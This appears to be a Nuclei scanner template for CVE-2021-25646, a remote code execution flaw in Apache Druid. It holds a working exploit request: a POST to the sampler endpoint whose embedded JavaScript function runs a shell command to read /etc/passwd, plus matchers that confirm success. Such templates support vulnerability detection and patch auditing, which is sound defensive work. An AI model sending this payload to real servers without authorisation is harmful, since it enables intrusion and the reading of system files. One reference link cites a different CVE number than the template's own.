id: CVE-2021-25646 info: name: Apache Druid - Remote Code Execution author: pikpikcu severity: high description: | Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Druid. reference: - https://paper.seebug.org/1476/ - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E - http://www.openwall.com/lists/oss-security/2021/01/29/6 - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2021-25864 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 epss-score: 0.97403 epss-percentile: 0.99899 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: druid tags: cve,cve2021,apache,rce,druid http: - raw: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "type":"index", "spec":{ "ioConfig":{ "type":"index", "firehose":{ "type":"local", "baseDir":"/etc", "filter":"passwd" } }, "dataSchema":{ "dataSource":"odgjxrrrePz", "parser":{ "parseSpec":{ "format":"javascript", "timestampSpec":{ }, "dimensionsSpec":{ }, "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", "":{ "enabled":"true" } } } } }, "samplerConfig":{ "numRows":10 } } matchers-condition: and matchers: - type: word part: body words: - "numRowsRead" - "numRowsIndexed" condition: and - type: word part: header words: - "application/json" - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502204f7c91ebcd27819dfaf49714ed194d24e9ccbfdfd3268ff975ce038233bd96740221009f4f608f087ac452228db7d6ea9e3d483d8c23f6e54dc8a1c07ef547b31601e3:922c64590222798bb761d5b6d8e72950